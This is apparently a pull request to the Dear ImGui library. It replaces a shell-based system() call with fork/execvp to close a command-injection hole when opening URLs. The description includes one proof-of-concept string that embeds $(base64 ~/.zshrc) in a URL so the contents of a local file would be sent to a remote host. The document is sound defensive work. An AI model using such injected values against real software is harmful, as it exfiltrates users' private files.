### PR TITLE
Fix arbitrary command injection in the Unix version of `PlatformOpenInShellFn_DefaultImpl`

### DIFF
--- a/imgui.cpp
+++ b/imgui.cpp
@@ -14353,11 +14353,18 @@ static void SetClipboardTextFn_DefaultImpl(void* user_data_ctx, const char* text
 
 //-----------------------------------------------------------------------------
 
-#if defined(__APPLE__) && defined(TARGET_OS_IPHONE) && !defined(IMGUI_DISABLE_DEFAULT_SHELL_FUNCTIONS)
+#ifndef IMGUI_DISABLE_DEFAULT_SHELL_FUNCTIONS
+#if defined(__APPLE__) && TARGET_OS_IPHONE
 #define IMGUI_DISABLE_DEFAULT_SHELL_FUNCTIONS
 #endif
 
-#if defined(_WIN32) && !defined(IMGUI_DISABLE_WIN32_FUNCTIONS) && !defined(IMGUI_DISABLE_DEFAULT_SHELL_FUNCTIONS)
+#if defined(_WIN32) && defined(IMGUI_DISABLE_WIN32_FUNCTIONS)
+#define IMGUI_DISABLE_DEFAULT_SHELL_FUNCTIONS
+#endif
+#endif
+
+#ifndef IMGUI_DISABLE_DEFAULT_SHELL_FUNCTIONS
+#ifdef _WIN32
 #include <shellapi.h>   // ShellExecuteA()
 #ifdef _MSC_VER
 #pragma comment(lib, "shell32")
@@ -14366,18 +14373,32 @@ static bool PlatformOpenInShellFn_DefaultImpl(ImGuiContext*, const char* path)
 {
     return (INT_PTR)::ShellExecuteA(NULL, "open", path, NULL, NULL, SW_SHOWDEFAULT) > 32;
 }
-#elif !defined(IMGUI_DISABLE_DEFAULT_SHELL_FUNCTIONS)
+#else
+#include <sys/wait.h>
+#include <unistd.h>
 static bool PlatformOpenInShellFn_DefaultImpl(ImGuiContext*, const char* path)
 {
 #if __APPLE__
-    const char* open_executable = "open";
+    const char* args[] { "open", "--", path, NULL };
 #else
-    const char* open_executable = "xdg-open";
+    const char* args[] { "xdg-open", path, NULL };
 #endif
-    ImGuiTextBuffer buf;
-    buf.appendf("%s \"%s\"", open_executable, path);
-    return system(buf.c_str()) != -1;
+    pid_t pid = fork();
+    if (pid < 0)
+        return false;
+    else if (!pid)
+    {
+        execvp(args[0], const_cast<char **>(args));
+        exit(-1);
+    }
+    else
+    {
+        int status;
+        waitpid(pid, &status, 0);
+        return WEXITSTATUS(status) == 0;
+    }
 }
+#endif
 #else
 static bool PlatformOpenInShellFn_DefaultImpl(ImGuiContext*, const char*) { return false; }
 #endif // Default shell handlers


### PR DESCRIPTION
`system` runs the command through the user's shell making it effectively code. In practice some inputs will behave unexpectedly. And of course, the vulnerability can be exploited to do anything:

```cpp
const char *some_external_input = "https://cfillion.ca/$(base64 ~/.zshrc)";
ImGui::TextLinkOpenURL("Click me", some_external_input);
```

Expected: It opens that URL as-is. Current: It sends the contents of a local file to a remote host.

(xdg-open doesn't support `--` to separate arguments from the input path/URL. But it also has no behavior-modifying args beside `--version/help/manual`.)

---

Also `TARGET_OS_IPHONE` is defined even on macOS (it's 0).